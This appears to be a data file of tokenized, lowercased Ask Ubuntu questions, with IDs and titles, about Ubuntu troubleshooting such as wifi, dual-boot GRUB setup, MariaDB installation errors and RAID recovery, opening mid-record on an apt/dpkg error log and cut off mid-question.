5.5.34-0ubuntu0.12.04.1 ( using ... /mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing /var/cache/apt/archives/mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) angel @ voix : ~ $ sudo apt-get install mysql-server php5-mysql reading package lists ... done building dependency tree reading state information ... done mysql-server is already the newest version . php5-mysql is already the newest version . the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 libubuntuoneui-3.0-1 thunderbird-globalmenu use 'apt-get autoremove ' to remove them . the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca mailx the following packages will be upgraded : mysql-server-5.5 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . need to get 0 b/8,827 kb of archives . after this operation , 32.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable ( reading database ... dpkg : warning : files list file for package `mysql-server-5.5 ' missing , assuming package has no files currently installed . ( reading database ... 172971 files and directories currently installed . ) preparing to replace mysql-server-5.5 5.5.34-0ubuntu0.12.04.1 ( using ... /mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing /var/cache/apt/archives/mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
369775	ca n't connect to or search wi-fi	i just installed the latest version of ubuntu ; i think it was 13 or something . anyway , i got it running , and now i 've been trying to connect to my wi-fi ap . no matter where i go i do n't see an option for wi-fi . i looked on the computer and found some commands to use in a terminal to run a scan for wi-fi networks , but all of them returned the error : interface does n't support scanning what are step-by-step directions to make this work ?
369777	linux can see all of my windows 7 partition ?	is it normal for my windows 7 partition to be completely visible from ubuntu ? when in windows 7 it can not see any of the linux partition , just its own partition . i am a little worried something hasnt been set up correctly .
369780	overscan issue on a crt tv ubuntu 12.04	i built a htpc using an 8400gs s-video port to display on my old rca tv in my room . the top and side bar can not be seen . switching resolutions does n't help either . i 'm running nvidia driver 304
369782	ubuntu crashes with menu bar launcher freeze during software centre use	i recently reinstalled ubuntu 12.04 lts on a dell studio 1588 64-bit and ran into crashes as i was installing some software on the software centre . before this , i had display/screen problems that i needed to fix so i will briefly describe that in case it has any connection to the crashes . the problem was of screen crash/flickering ( related to ati mobility radeon hd 5400x ) when trying to adjust brightness and so i followed guidance from an earlier chain ( question 131967 ) to ( a ) use jockey to install fglrx update driver ( deactivate experimental beta driver ) and ( b ) edit grub to add acpi_backlight=vendor dell_laptop.backlight=0 the crashes that happened ( twice , while software centre was just finishing installation in the background ) was that all tabs ( on open firefox window ) stayed open along with cursor control with mousepad but all menu bars disappeared completely along with the launcher and the keyboard also turned unresponsive . so there seemed to be no way to close windows or shut down the computer except for a forced hard shut down of the system using the start button . this is very similar to questions # 167540 and # 298843 , which seem to be closed . why is this happening ? is there some update or fix i need to make ? thanks !
369783	how to install asus sonicmaster n46vb in ubuntu 12.04	i 'm new to ubuntu , using ubuntu 12.04 , and i recently bought the asus n46vb and it comes with a subwoofer sonicmaster , but it seems that is not configured in the system , and ubuntu does not recognize it when i connect it . i tried the answers to this question : no sound from external subwoofer `` sonic master '' on an asus n76vm , but they did not work for me because there is a file that does not exist , and i think it should be in the model , so if you can help me i would be very grateful .
369784	in ubuntu 13.10 , none of the hotkeys of libreoffice works in non-english keyboard layout	in ubuntu 13.10 , the hotkeys/shortcut-keys ( ctrl+b , ctrl+s etc ) in libreoffice are language dependent and work in english language only . while writing in any other language ( i.e . any cyrillic and/or any bengali etc ) it 's impossible to use hotkeys , they just do n't do anything . switching to english input language enable hotkeys once again . this is very frustrating as user needs to switch language to save document , to make it bold , or italic , etc . this was not experienced in ubuntu 13.04 . steps to reproduce : system settings > text entry . add another keyboard layout beside english [ in my case it is bengali ( probhat ) ] now launch writer . switch the keyboard layout from english ( us ) to bengali ( probhat ) by pressing ctrl+space . press ctrl+b to change font weight to bold . error : font weight does not get changed . expected : font weight should change to bold . note : none other system hotkeys work as expected . i.e . ctrl+s to save , or ctrl+b to subscript , or ctrl+i to italic etc . workaround : the only way is to - change the keyboard layout to english then press desired hotkey then switch keyboard layout back to bengali . the issue is critical , as it make writer very slow for keyboard-only typing .
369785	accidental running of do-release-upgrade	accidentally i ran sudo do-release-upgrade -d and stopped it . but it seems it has changed my ubuntu 13.10 to 14.04 sources and if i update the system it will be automatically upgraded . how can i restore it to previous sources ? edit : i found these are unchecked : so i rechecked them as in the image . however , i 'm not sure if everything is as before . $ cat /etc/apt/sources.list # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # deb http : //archive.ubuntu.com/ubuntu saucy main restricted universe # # major bug fix updates produced after the final release of the # # distribution . # deb http : //archive.ubuntu.com/ubuntu saucy-updates main restricted universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # deb http : //archive.ubuntu.com/ubuntu saucy multiverse # deb http : //archive.ubuntu.com/ubuntu saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //archive.ubuntu.com/ubuntu saucy-backports main restricted multiverse universe # deb http : //archive.ubuntu.com/ubuntu saucy-security main restricted universe # deb http : //archive.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //archive.ubuntu.com/ubuntu saucy main universe multiverse deb http : //security.ubuntu.com/ubuntu/ saucy-security multiverse main universe deb http : //archive.ubuntu.com/ubuntu saucy-updates multiverse main universe and : ponyo @ ponyo-pc : ~ $ lsb_release -a lsb version : core-2.0-ia32 : core-2.0-noarch : core-3.0-ia32 : core-3.0-noarch : core-3.1-ia32 : core-3.1-noarch : core-3.2-ia32 : core-3.2-noarch : core-4.0-ia32 : core-4.0-noarch : core-4.1-ia32 : core-4.1-noarch : security-4.0-ia32 : security-4.0-noarch : security-4.1-ia32 : security-4.1-noarch distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy
369786	configuring grub to dual-boot across two discs ?	i 'd like to have my windows 7 on one disc and my ubuntu on a second disc . windows 7 is already installed- how should i go about configuring grub to treat the two discs with two operating systems ? instead of `` install alongside windows 7 '' should i choose the custom partition management option during installation ?
369788	are apache , php and mysql installed by default ?	are the apache server , php , and mysql installed by default when you install ubuntu 13.10 , or should you install them separately later ? original question : quiero saber si en la instalaci贸n de ubuntu 13.10 viene instalado por default un servidor apache , el in茅rprete php y un servidor mysql . o hay que inslatar todo por nuestra cuenta ?
369797	how to change default icon size in chrome and other apps ?	i would like to make the default icon size at the top of chrome ( and other apps ) , and the default zoomed-in-ness , larger for my aging eyes ? can i ask how to do it ? and thanks
369799	installing ubuntu over windows and existing partitions	i want to install ubuntu , becouse i am sick of windows.i have partition with windows7 ( c : ) , partition wih some private data ( d ) and some programs/games ( e ) . i do n't want to have no windows , no private data and no games , justo state like this in meaning of partitions : c , d , e - all blank except c ( ubuntu on it ) - and d : and e : ready for ubuntu to handle it and save stuff on it.how to do this ? if i choose install over win7 , will this erase not only data but partitions too ? and if to choose alone to handle installation and partitioning , what to do to have state like i have ( c : d : and e : ) ? partition sizes are : c-488 gb , d - 976 gb , e-398 gb , justo to say - ram 8gb ( i supose do n't need extra swap creation . ) please help .
369802	problem in uninstall chrome . i got error so that i could open ubuntu software center too	sir i installed chrome by typing following commands : sudo add-apt-repository ppa : a-v-shkop/chromium-dev sudo apt-get update sudo apt-get install chromium-browser then i got big error i ca n't uninstall chrome . i got one error when i open ubuntu software center and it is not at all opening and it is saying ubuntu experience internal error.the following is the type of error is showing in pop up menu . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/a-v-shkop-chromium-precise.list' i tried to uninstall chrome using purge command in termaial ... nothing is working . in terminal : sudo apt-get purge google-chrome-stable [ sudo ] password for dhinesh : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package google-chrome-stable
369803	wi-fi on macbook pro 8,1	this has been answered before . the answers is plug in ethernet and install linux-firmware-nonfree . i do n't have an ethernet connection . how to install that package ?
369804	searching in the ubuntu software manager	i am a ubuntu newbie , though i have briefly used mint . i want to find how to search by name for available-to-download software through the software center . can i ask how i do this ? thanks .
369806	how to fix “xlib : extension ”record“ missing on display :1” in vnc session ?	0 down vote favorite i am running a jnativehook capture program on ubuntu . when i run the session on default x session things are working fine . however when i run the same program from vnc session , it fails with `` xlib : extension `` record '' missing on display '' . i checked that this extension is loaded in x which is started by display manager/init . however i am not sure if indeed is initialized during vncserver startup . i could not see anything related in the vnc log . i tried create custom xorg.conf with module section , which explicitly loads record extension as suggested by many posts but did not help . my environment : xorg-server : 2.1.12.4-6 tightvncserver : 1.3.9 the same thing works fine on my centos 6.4 setup .
369807	python script liking to gui using ide	i am studying python . now i can write python scripts ( codes ) to some extent . i used idle for this . i am interested in making gui to those written programs . i like to do it using an ide rather than using pygtk or tkinter . can anyone help me how to start with this and link my scripts to a gui ? i downloaded a ide called glade , but i do n't know how to use this ide . i need some tutorial guide also . can anyone help me , please ? thank you !
369812	android avd running with errors	i have installed android 4.3 avd bundle on ubuntu 12.4 lts . when i start avd it shows too many errors . starting emulator for avd 'avd_for_3_7_fwvga_slider' failed to load libgl.so error libgl.so : can not open shared object file : no such file or directory failed to load libgl.so error libgl.so : can not open shared object file : no such file or directory emulator : emulator window was out of view and was recentered how to fix these problems ?
369818	wifi hotspot for ubuntu 12.04	i was just trying to activate my wifi hotspot on my ubuntu 12.04 , and i could not.i have a `` broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) '' . could any one help me to activate my wifi hotspot .
369823	connection speed between ubuntu 13.04 and windows 7 real slow only after using something	been working on this for a couple of hours now and i think i have just confused myself way too much . i recently completely uninstalled windows and installed ubuntu and have been having so much fun i might add : ) anyway , a couple of people used to access my machine when it was windows for files and what not but now that i have gone to ubuntu i ca n't get it working . i have gotten windows 7 shares to work fines connecting to my machine but from my machine to any windows machines , nope . i right clicked on the drive i wanted to share from /media/username and shared it and added the smbpasswd and what not . i got all that going , i can see the share from the windows machine and map it and read it . once i do read it , say open a file or what not connection speed drops right away . ping go up to over 2000ms and it becomes unusable . it also drops the share once i restart my machine , i think because it does n't mount quick enough ? i 'm not too sure what config files to post with this question either , sorry .
369825	wd mbwe ii ( white strip light ) unable to access	i do not know if this is the right place to ask this question ... i hope someone here can help . i 'm trying to retrieve data from a wd mbwe ii ( white strip light ) 2tb ( wd20000h2nc-00 ) nas device . device has 2 x 1tb hard drives . was working fine until a few days ago . i guess there was a power failure and after that i am unable to access the 'public ' or the 'download ' folder anymore . i have been searching for answers everywhere but came up empty handed . web gui still works , ssh works . i do not remember what raid setting i used when i first got the drive . i can see from gui that it is set as `` stripe '' . i hooked up both the drives on my pc and ufs explorer sees the drives . but so far i am unable to retrieve any of my data . using ubuntu live cd : started up disk utility and i see the following drives under `` multi-disk devices '' raid-0 array [ level : stripe ( raid-0 ) state : not running , not enough components to start ] 2.0 gb raid-1 array [ level : mirror ( raid-1 ) state : running . action : idle ] 1.0 gb raid-1 array [ level : mirror ( raid-1 ) state : running . action : idle ] under raid-0 array , when i click the `` start raid array '' button i get the following error : `` not enough components to start the raid array '' . if needed , i can attach some logs i was able to retrieve using putty . can someone here please help .
369826	errors in bumblebee	i recently installed bumblebee.my problem is when i ran any command in terminal it showed me an error.if i run following commands in terminal bumblebeed -- driver driver bumblebeed -- group group bumblebeed -- pidfile file it shows me following errors [ 904.901313 ] [ error ] module 'driver ' is not found . [ 2656.497095 ] [ error ] can not open or write pidfile /var/run/bumblebeed.pid . [ 2729.466978 ] [ error ] could not set the gid of bumblebee : operation not permitted respectively . how can i fix this or do i have to reinstall bumblebee ?
369827	how can i route audio from rarack to a ardour ?	i am a guitar player , and i use ardour to record my audio , and rarack as my effects panel . but i need a way to route the output sounds from rarack to ardour , and still have a audio output . any ideas ?
369828	windows troubleshooting menu after dual boot menu	i just installed xubuntu 12.04 along with windows xp on my desktop ( i know , xp is darn old , but i do n't think windows 7 will run smoothly on my 1 gb of ram ) . the installation process was without any hiccups , but when i restarted the system and selected windows xp from the dual boot menu , the windows troubleshooting screen came , you know , the screen with : '' windows has encountered a problem . we 're sorry for the inconvenience . what do you want to do ? start windows normally , boot in safe mode ... . '' after i selected start windows normally , windows xp booted fine and everything works fine . if everything works fine , is the error message just a flunk ? is everything fine on my system and windows is just showing an unnecessary error message ?
369830	sftp connection failed , strange error messsage	while i am trying to connect to a remote system from terminal using sftp sftp user @ host.ip.address connection is failing and a message coming received message too long < some long number > i connect that machine frequently , can not understand what is causing the problem .
369831	chromium process causes rise in gpu temperature	my gpu is about 10 degrees hotter than usual . ubuntu 12.04 with gnome shell nvidia gtx275
369832	back/forward buttons do n't show up in xev ( pcmanfm does n't work )	xinput test 9 results in the buttons being identified as 8 and 9 . however , the results in xev are the following : leavenotify event , serial 33 , synthetic no , window 0x2e00001 , root 0xa2 , subw 0x0 , time 780795 , ( 17,2 ) , root : ( 18,94 ) , mode notifygrab , detail notifyancestor , same_screen yes , focus yes , state 0 enternotify event , serial 33 , synthetic no , window 0x2e00001 , root 0xa2 , subw 0x0 , time 780970 , ( 17,2 ) , root : ( 18,94 ) , mode notifyungrab , detail notifyancestor , same_screen yes , focus yes , state 0 keymapnotify event , serial 33 , synthetic no , window 0x0 , keys : 4294967202 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 this presumably results in a failure to xbindkey to said buttons ( as an attempted solution to ) and failure in pcmanfm . as per the instructions here : https : //help.ubuntu.com/community/mousecustomizations /etc/x11/xorg.conf did not exist i set /etc/x11/xorg.conf to : section `` inputdevice '' identifier `` logitech '' driver `` evdev '' option `` name '' `` logitech usb-ps/2 optical mouse '' endsection inputdevice `` logitech '' `` corepointer '' however , this caused the operating system to fail identifying devices forcing a rollback to this configuration . how does one facilitate production of a button event in xev in these circumstances ? if there is no facilitation of # 1 or if one is irrelevant to the following , how does one get back and forward buttons working in pcmanfm ?
369833	nautilus can not resize column ubuntu 13.10	i ca n't resize columns ' width ( name , size , etc . ) in nautilus 's 'view items as a list ' mode after my upgrade to ubuntu 13.10 ( 32-bit ) ; while i just had point-and-drag in 13.04 .
369837	how to make custom urls on lan	i 've been trying to find a solution to this for a long time ... what i wish to do is create custom urls on lan against which users can easily access to some site without using the actual url e.g . if the user types : http : searchme in the browser then he/she will be redirected to http : google.com similarly , http : checkmail in the browser and he/she will be landed on http : gmail.com i read somewhere that such thing is possible by editing the rhosts or hosts file on the server . any help here would be appreciated !
369838	upgrade to ubuntu 13.10 from iso image	having installed ubuntu 13.04 i 've downloaded ubuntu 13.10 iso to upgrade from it . this answer does n't work because there is no cdromupgrade file in the mounted iso disk . how can i upgrade 13.04 to 13.10 using the iso image or cd/dvd media ?
369842	installing nvidia graphics driver	how to stop x server before installing nvidia graphics driver in ubuntu 13.10
369845	window control does not return to open office write , if switch back from gimp	if i work with open office write . than work with gimp . when i switch back to open office write , the windows control ( on the top ( by default ) black strip ) still show menu of gimp , instead of open office write . dash and right click still work though . i upgraded from 13.04 . previously it works as intended since 12.04 . thank you . intel® core™ i3-2350m cpu @ 2.30ghz × 4 intel® sandybridge mobile x86/mmx/sse2 memory 1.9 gib , 32 bit version asus a43e
369849	qtcreator install not recognized	i 've installed qtcreator 5.1.1 according to this site install qt-5 and everything is working well with it . i installed it /opt/qt5 . unfortunately , muon software center does not list qtcreator in its list of installed programs . also , when i try to install other things via command line ( e.g . glew , qt designer ) i get an error like : the following packages have unmet dependencies : qt-sdk : depends : qtcreator but it is not going to be installed it seems that my qtcreator install is not recognized because i did not install it through the software center . any guides on how i can correct this problem ? thank you !
369851	missing gui application for 7-zip ?	i installed 7-zip from software center , but where is the gui application ? original question asked by a user : ich habe 7zip aus dem softwarecentrum installiert , finde aber kein symbol zum รถffnen des programmes . kann hier jemand helfen ?
369854	ca n't find skype in ubuntu 13.10 ? how do i get it ?	i ca n't find skype listed in ubuntu 13.10 ? i could n't get any of the previous suggestions to work for me . software center does not have an `` edit '' tab or button that i can find . i installed the above distribution around a week ago on a 3/4 yr. old homebuild that dad put together before he passed . am extremely linux/ubuntu illiterate and challenged by huge learning curve . what do you suggest i do to help get over this hurdle ?
369856	installing utorrent on ubuntu 13.10	i want to install utorrent but unfortunately it is not available in software center . so please tell me how to do so using terminal .
369859	from developer preview to version 1.0	i installed ubuntu touch ( developer preview ) on my galaxy nexus since it was released . now i 'm trying to install the version 1.0. any instruction on how to update ?
369860	hp probook 4540s ubuntu 12.04 wireless not working	i bought a hp probook 4540s with sese linux installed . i formatted it and installed ubuntu 12.04lts as i was not familiar with commands in suse . during and after installation i realized it was not possible to get wireless . i thought it was a problem with drivers but even after installing drivers i still was not able to get the wireless working . i have been googling this problem and for some who had similar problem , they solved it by installing another wireless card . i do not want to go to this extent and that 's why am here for your help . when i run the following command that 's what i get ; lawrence @ lawrence-2013 : ~ $ lspci -vnn | grep network 03:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] solution ( at the time i was posting this problem i did not have enough reputation to answer my own question . that is why i answered it this way ) i managed to solve this problem . initially i had installed a 32-bit ubuntu ; i replaced it with a 64-bit one . my laptop ( hp probook 4540s ) is a 64-bit and i think the problem was because i was installing a 32-bit ubuntu os in it . everything works fine now . i hope this helps someone .
369864	disk failed during reconstruction	yesterday a disk failed in my mdadm raid-5 array . i replaced the faulty disk and added it to the array . the reconstruction begins . when i woke up this morning i had a uncomforting mail about a disk failure . md0 : active raid5 sda [ 6 ] sde [ 5 ] ( f ) sdf [ 4 ] sdc [ 2 ] sdd [ 3 ] 3906525184 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 5/3 ] [ _uuu_ ] [ =================== > . ] recovery = 97.8 % ( 955205796/976631296 ) finish=11.8min speed=30086k/sec now /proc/mdstat says : md0 : active raid5 sda [ 6 ] ( s ) sde [ 5 ] ( f ) sdf [ 4 ] sdc [ 2 ] sdd [ 3 ] 3906525184 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 5/3 ] [ _uuu_ ] is there a way to save the array ? or am i screwed ?
369866	problems during installation of mariadb on ubuntu 12.04	i 'm trying to install mariadb according to this documentation : sudo apt-get install python-software-properties sudo apt-key adv -- recv-keys -- keyserver hkp : //keyserver.ubuntu.com:80 0xcbcb082a1bb943db sudo add-apt-repository 'deb http : //mirrors.fe.up.pt/pub/mariadb/repo/5.5/ubuntu precise main' sudo apt-get update sudo apt-get install mariadb-server but faced with problem which is solved at this topic i 'm using this command : sudo apt-get install mariadb-server-5.5= '' 5.5.33a+maria-1~saucy '' mariadb-client 5.5= '' 5.5.33a+maria-1~saucy '' \libmysqlclient18= '' 5.5.33a+maria-1~saucy '' \mysql-common= '' 5.5.33a+maria-1~saucy '' intead of saucy i 've wrote precise but it does n't help , i 'm getting such errors : reading package lists ... done building dependency tree reading state information ... done note , selecting 'mariadb-galera-server-5.5 ' for regex '5.5' note , selecting 'mariadb-test-5.5 ' for regex '5.5' note , selecting 'libghc-simpleea-dev-0.1.1-a1525 ' for regex '5.5' note , selecting 'hl5150dlpr ' for regex '5.5' note , selecting 'libghc-haskelldb-prof-2.1.1-5a57e ' for regex '5.5' note , selecting 'libassa3.5-5-dbg ' for regex '5.5' note , selecting 'libassa3.5-5-dev ' for regex '5.5' note , selecting 'sword-text-gerlut1545 ' for regex '5.5' note , selecting 'mariadb-server-5.5 ' for regex '5.5' note , selecting 'mariadb-client-5.5 ' for regex '5.5' note , selecting 'mariadb-server-core-5.5 ' for regex '5.5' note , selecting 'cupswrapperhl5150d ' for regex '5.5' note , selecting 'libghc-http-conduit-prof-1.2.5-502c3 ' for regex '5.5' note , selecting 'libghc-hdbc-sqlite3-prof-2.3.3.0-fe5b5 ' for regex '5.5' note , selecting 'mysql-server-core-5.5 ' for regex '5.5' note , selecting 'libghc-leksah-server-dev-0.12.0.4-45c55 ' for regex '5.5' note , selecting 'mariadb-client-core-5.5 ' for regex '5.5' note , selecting 'libghc-hdbc-sqlite3-dev-2.3.3.0-fe5b5 ' for regex '5.5' note , selecting 'libghc-primitive-dev-0.4.1-50546 ' for regex '5.5' note , selecting 'libghc-haskelldb-dev-2.1.1-5a57e ' for regex '5.5' note , selecting 'libghc-simpleea-prof-0.1.1-a1525 ' for regex '5.5' note , selecting 'u-boot-linaro-smdk5250 ' for regex '5.5' note , selecting 'libghc-void-prof-0.5.5-f4fcb ' for regex '5.5' note , selecting 'libassa3.5-5 ' for regex '5.5' note , selecting 'netbeans5.5 ' for regex '5.5' note , selecting 'handlersocket-mysql-5.5 ' for regex '5.5' note , selecting 'libghc-void-dev-0.5.5-f4fcb ' for regex '5.5' note , selecting 'mysql-client-core-5.5 ' for regex '5.5' note , selecting 'libghc-http-conduit-dev-1.2.5-502c3 ' for regex '5.5' note , selecting 'libghc-bifunctors-prof-0.1.2-5156d ' for regex '5.5' note , selecting 'hl5050lpr ' for regex '5.5' note , selecting 'libghc-ansi-terminal-prof-0.5.5-3c75c ' for regex '5.5' note , selecting 'libghc-yesod-json-dev-0.3.1-85953 ' for regex '5.5' note , selecting 'solr-tomcat5.5 ' for regex '5.5' note , selecting 'cupswrapperhl5250dn ' for regex '5.5' note , selecting 'libghc-mime-mail-prof-0.4.1.1-ee5a5 ' for regex '5.5' note , selecting 'libvirtuoso5.5-cil ' for regex '5.5' note , selecting 'libxmlplaylist-ocaml-dev-iq545 ' for regex '5.5' note , selecting 'libghc-bifunctors-dev-0.1.2-5156d ' for regex '5.5' note , selecting 'libghc-mime-mail-dev-0.4.1.1-ee5a5 ' for regex '5.5' note , selecting 'mysql-testsuite-5.5 ' for regex '5.5' note , selecting 'libghc-primitive-prof-0.4.1-50546 ' for regex '5.5' note , selecting 'mysql-source-5.5 ' for regex '5.5' note , selecting 'libghc-yesod-json-prof-0.3.1-85953 ' for regex '5.5' note , selecting 'cupswrapperhl5050 ' for regex '5.5' note , selecting 'libghc-ansi-terminal-dev-0.5.5-3c75c ' for regex '5.5' note , selecting 'mysql-server-5.5 ' for regex '5.5' note , selecting 'brhl5250dnlpr ' for regex '5.5' note , selecting 'cupswrapperfax5750e ' for regex '5.5' note , selecting 'mysql-client-5.5 ' for regex '5.5' note , selecting 'fax5750elpr ' for regex '5.5' e : version '5.5.33a+maria-1~precise ' for 'mysql-server-core-5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'mysql-client-core-5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'mysql-client-5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'mysql-server-5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libassa3.5-5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'handlersocket-mysql-5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libassa3.5-5-dbg ' was not found e : version '5.5.33a+maria-1~precise ' for 'libassa3.5-5-dev ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-void-dev-0.5.5-f4fcb ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-void-prof-0.5.5-f4fcb ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-ansi-terminal-dev-0.5.5-3c75c ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-ansi-terminal-prof-0.5.5-3c75c ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-http-conduit-dev-1.2.5-502c3 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-http-conduit-prof-1.2.5-502c3 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-bifunctors-dev-0.1.2-5156d ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-bifunctors-prof-0.1.2-5156d ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-primitive-dev-0.4.1-50546 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-primitive-prof-0.4.1-50546 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-haskelldb-dev-2.1.1-5a57e ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-haskelldb-prof-2.1.1-5a57e ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-hdbc-sqlite3-dev-2.3.3.0-fe5b5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-hdbc-sqlite3-prof-2.3.3.0-fe5b5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-leksah-server-dev-0.12.0.4-45c55 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-mime-mail-dev-0.4.1.1-ee5a5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-mime-mail-prof-0.4.1.1-ee5a5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-simpleea-dev-0.1.1-a1525 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-simpleea-prof-0.1.1-a1525 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-yesod-json-dev-0.3.1-85953 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libghc-yesod-json-prof-0.3.1-85953 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libxmlplaylist-ocaml-dev-iq545 ' was not found e : version '5.5.33a+maria-1~precise ' for 'libvirtuoso5.5-cil ' was not found e : version '5.5.33a+maria-1~precise ' for 'solr-tomcat5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'mysql-source-5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'mysql-testsuite-5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'netbeans5.5 ' was not found e : version '5.5.33a+maria-1~precise ' for 'sword-text-gerlut1545 ' was not found e : version '5.5.33a+maria-1~precise ' for 'cupswrapperhl5250dn ' was not found e : version '5.5.33a+maria-1~precise ' for 'cupswrapperfax5750e ' was not found e : version '5.5.33a+maria-1~precise ' for 'cupswrapperhl5050 ' was not found e : version '5.5.33a+maria-1~precise ' for 'cupswrapperhl5150d ' was not found e : version '5.5.33a+maria-1~precise ' for 'brhl5250dnlpr ' was not found e : version '5.5.33a+maria-1~precise ' for 'fax5750elpr ' was not found e : version '5.5.33a+maria-1~precise ' for 'hl5050lpr ' was not found e : version '5.5.33a+maria-1~precise ' for 'hl5150dlpr ' was not found e : version '5.5.33a+maria-1~precise ' for 'u-boot-linaro-smdk5250 ' was not found how can i fix it and install mariadb ?
369867	unable to download anything	when ever i try to download or update anything , the computer simply states that the sources are questionable , asks me to repair it and then nothing happans . what 's going on ? ? i 'm usin 12.04 lts
369869	enable file filters in meld ?	i use meld normally in a git web project ( system : ubuntu-gnome 13.10 ) . i want it to skip scanning certain files and folders , such as the .meteor directory ( which takes a while to scan ) . ubuntu-gnome installs meld 1.8.1 . it has under edit - > preferences - > file filters an option to add a new file filter . more details : http : //meldmerge.org/help/file-filters.html # file-name-filter i added new rules for the file and folder i want to skip ( and checked the 'activate ' option ) , but it does not seem to work , even after restarting meld . the new rules just do n't seem to work - i see meld is scanning the .meteor folder and also , it shows the allegedly ignored file ( index.html ) as changed . i do n't see an open meld bug for `` file filters not working '' . i am inclined to think it does work , only i 'm doing something wrong . any ideas how to tackle this would be most welcome !
369870	what location to put bootloader , when running multiple drives and partition	i have win8 on my desktop , where a 120g ssd is used to run windows and some select applications , while i have a 2tb hdd to provide basic file storage and where possible , install applications instead of on the ssd . i want to install ubuntu on a new partition of the hdd ( i allocated 300gb , with 5gb swap file ) . i 've used a usb to install the os , which seemed to have done the job . however , after prompting for a restart , i can no longer boot to ubuntu . during instillation i was confused about where to install the `` boot loader instillation '' . i ended up selecting `` /dev/stb '' because i figured i would be able to boot with bios by selecting the hdd drive as a priority over the ssd . the bootloader is a large part of where i think i went wrong . my partition system looked something like this : /dev/sta ... //ssd ~120 gb /dev/sta1 ntfs ( 350 mb ) //win8system /dev/sta2 ntfs ( 118 gb ) //win8c-drive /dev/stb ... //hdd ~2tb /dev/stb1 ntfs ( 1563 gb ) //filestorage /dev/stb5 free space ( 300 gb ) //space i want to use for linux ( note : created two partitions from the 300gb , ~5gb and 295gb . stb5 , stb6 . ) it 'd be great if i could get an explanation of what drive you 